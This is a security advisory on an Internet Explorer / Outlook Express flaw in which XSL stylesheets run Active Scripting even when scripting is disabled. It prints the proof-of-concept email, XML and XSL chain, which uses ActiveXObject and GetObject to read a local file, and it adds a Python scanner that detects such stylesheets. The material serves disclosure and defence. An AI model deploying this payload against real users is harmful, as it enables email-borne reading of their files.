COMMAND

    IE

SYSTEMS AFFECTED

    XML scripting in IE, Outlook Express

PROBLEM

    The following is based on Georgi Guninski's security advisory #43.
    There is some disagreement with Microsoft about whether this  works
    on a fully patched IE 5.x.  We believe we were running fully patched
    IE according to the patching rules in Microsoft's security bulletins.
    The deciding factor seems to be the version of Windows Script  Host
    (WSH), which is described in MS01-015 at:

        http://www.microsoft.com/technet/security/bulletin/ms01-015.asp

    To check whether you are vulnerable, use the DEMONSTRATION  below.
    Note that this patch was updated after its initial release,  which
    may explain the differing results.

    It is possible to execute Active Scripting with the help of XML and
    XSL even if Active Scripting is disabled in all security zones. This
    is especially dangerous in email messages.  Though this is not a
    typical exploit in itself, it can be used as a building block in
    other exploits, especially email-borne ones.

    The problem is XML stylesheets (XSL), which may contain Active
    Scripting that is executed regardless of the Active Scripting
    settings in IE/Outlook Express.  Below is a demonstration that
    executes Active Scripting containing the demo from advisory #41
    (reading a local file).  When xstyle.eml is viewed with IE or OE,
    the Active Script in it is executed regardless of the user's
    settings.

        --xstyle.eml--------------------------------------------------------------
        ....
        <IFRAME SRC="http://SOMEHOST/xstyle.xml"></IFRAME>
        ....
        --------------------------------------------------------------------------

        --xstyle.xml--------------------------------------------------------------
        <?xml version="1.0"?>
        <?xml-stylesheet type="text/xsl" href="xstyle.xsl" ?>
        <doc>
        style
        </doc>
        --------------------------------------------------------------------------

        --xstyle.xsl--------------------------------------------------------------
        <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
        <xsl:script>
        <![CDATA[
        // Script embedded in the stylesheet: runs when the XML is rendered,
        // regardless of the zone's Active Scripting setting.
        a=new ActiveXObject('htmlfile');
        a.open();
        a.write("<html><body>gg</body></html>");
        a.close();
        // Script control switched to VBScript so GetObject is available.
        v=new ActiveXObject("MSScriptControl.ScriptControl.1");
        v.Language="VBScript";
        v.eval('MsgBox ("This is VBSCRIPT",65,"This is VBSCRIPT")');
        // Advisory #41 demo: load local C:/test.txt through the htmlfile
        // moniker and read it back as an HTML document.
        x=v.eval('GetObject("C:/test.txt","htmlfile")');
        v.eval('MsgBox ("Hi",65,"Hi")');
        // Show the file contents in the htmlfile window created above.
        a.location="about:Here is your file <BR>"+x.body.innerHTML;
        ]]>
        </xsl:script>
        </xsl:stylesheet>

    Demonstration:

        http://www.guninski.com/xstyle.eml

    Disable Active Scripting in all zones, open the above in IE or  OE,
    and if you see any message box you are vulnerable.  The first message
    box is shown before the local file is read, so the test does not
    depend on C:\test.txt existing.
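
    The following is an added example, not part of the advisory: a small
    Python scanner that follows the IFRAME -> XML -> XSL chain described
    above over captured mail content and flags any stylesheet carrying a
    script element, listing the calls (ActiveXObject, GetObject,
    ScriptControl) that reach outside the document.  The xstyle.xml and
    xstyle.xsl samples are the advisory's own; the .eml body and the
    benign report.xml/report.xsl pair are constructed for the example.
    It goes slightly beyond the page by also matching <msxsl:script> in
    the 1999 XSLT namespace, Microsoft's later equivalent of <xsl:script>;
    that namespace is an assumption not mentioned in the advisory.

```python
import re
import xml.etree.ElementTree as ET

# Script-bearing elements MSXML honours inside a stylesheet.  The advisory
# uses <xsl:script> in the WD-xsl namespace; <msxsl:script> in the 1999
# XSLT namespace is the later extension (assumption: not shown on the page).
SCRIPT_ELEMENTS = {
    "{http://www.w3.org/TR/WD-xsl}script",
    "{urn:schemas-microsoft-com:xslt}script",
}

# Substrings indicating the script reaches outside the document.
RISKY_CALLS = ("ActiveXObject", "GetObject", "ScriptControl")

PI_RE = re.compile(r"<\?xml-stylesheet\s+([^?]*)\?>")
HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""")
IFRAME_RE = re.compile(r"""<iframe\s+[^>]*?src\s*=\s*["']([^"']+)["']""", re.I)


def iframe_srcs(html):
    """Return the SRC of every IFRAME in an HTML mail body."""
    return IFRAME_RE.findall(html)


def stylesheet_refs(xml_text):
    """Return the href of every <?xml-stylesheet ... ?> processing instruction."""
    refs = []
    for pi in PI_RE.finditer(xml_text):
        m = HREF_RE.search(pi.group(1))
        if m:
            refs.append(m.group(1))
    return refs


def script_blocks(xsl_text):
    """Return (element tag, flagged calls) for each script element in a stylesheet."""
    root = ET.fromstring(xsl_text)
    found = []
    for el in root.iter():
        if el.tag in SCRIPT_ELEMENTS:
            body = "".join(el.itertext())  # CDATA content is plain text to ET
            found.append((el.tag, [c for c in RISKY_CALLS if c in body]))
    return found


def scan(files):
    """Follow IFRAME -> XML -> XSL over an in-memory {filename: content} set.

    References are resolved by basename, so http://SOMEHOST/xstyle.xml finds
    "xstyle.xml".  Returns one (entry file, document, stylesheet, tag, calls)
    tuple per script element reachable from an xml-stylesheet reference.
    """
    def local(ref):
        return files.get(ref.rsplit("/", 1)[-1])

    findings = []
    for name, text in sorted(files.items()):
        # The file itself plus any XML document its IFRAMEs pull in.
        docs = [(name, text)] + [(src, local(src)) for src in iframe_srcs(text)]
        for doc_name, doc in docs:
            if doc is None:
                continue  # framed document not captured; nothing to inspect
            for href in stylesheet_refs(doc):
                xsl = local(href)
                if xsl is None:
                    continue  # stylesheet not captured
                for tag, hits in script_blocks(xsl):
                    findings.append((name, doc_name, href, tag, hits))
    return findings


# Constructed mail body: the advisory only shows the IFRAME line.
XSTYLE_EML = """<html><body>
<IFRAME SRC="http://SOMEHOST/xstyle.xml"></IFRAME>
</body></html>"""

# xstyle.xml and xstyle.xsl as published in the advisory.
XSTYLE_XML = """<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="xstyle.xsl" ?>
<doc>
style
</doc>"""

XSTYLE_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
a=new ActiveXObject('htmlfile');
a.open();
a.write("<html><body>gg</body></html>");
a.close();
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
v.eval('MsgBox ("This is VBSCRIPT",65,"This is VBSCRIPT")');
x=v.eval('GetObject("C:/test.txt","htmlfile")');
v.eval('MsgBox ("Hi",65,"Hi")');
a.location="about:Here is your file <BR>"+x.body.innerHTML;
]]>
</xsl:script>
</xsl:stylesheet>"""

# Constructed benign pair: a stylesheet without any script element.
REPORT_XML = """<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="report.xsl"?>
<doc>quarterly figures</doc>"""

REPORT_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/"><html><body><xsl:value-of select="doc"/></body></html></xsl:template>
</xsl:stylesheet>"""

SAMPLE_FILES = {
    "xstyle.eml": XSTYLE_EML, "xstyle.xml": XSTYLE_XML, "xstyle.xsl": XSTYLE_XSL,
    "report.xml": REPORT_XML, "report.xsl": REPORT_XSL,
}

if __name__ == "__main__":
    for entry, doc, xsl, tag, hits in scan(SAMPLE_FILES):
        print(f"{entry}: {doc} -> {xsl}: {tag} calls {', '.join(hits) or 'nothing flagged'}")
```

    Run stand-alone it reports the advisory's chain twice (once entered
    through xstyle.eml, once through xstyle.xml directly) and stays
    silent on report.xml.  The stylesheet is parsed with ElementTree
    rather than matched by regex so that a script element is found
    whatever prefix the attacker binds to the namespace.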

SOLUTION

    Microsoft could not reproduce the problem on a fully patched IE 5.x
    or Outlook Express (probably Outlook as well, but this has not been
    tested).

    Microsoft states that updating WSH solves the issue, and updating WSH
    DOES resolve it.  Patching or upgrading the browser alone had no
    effect.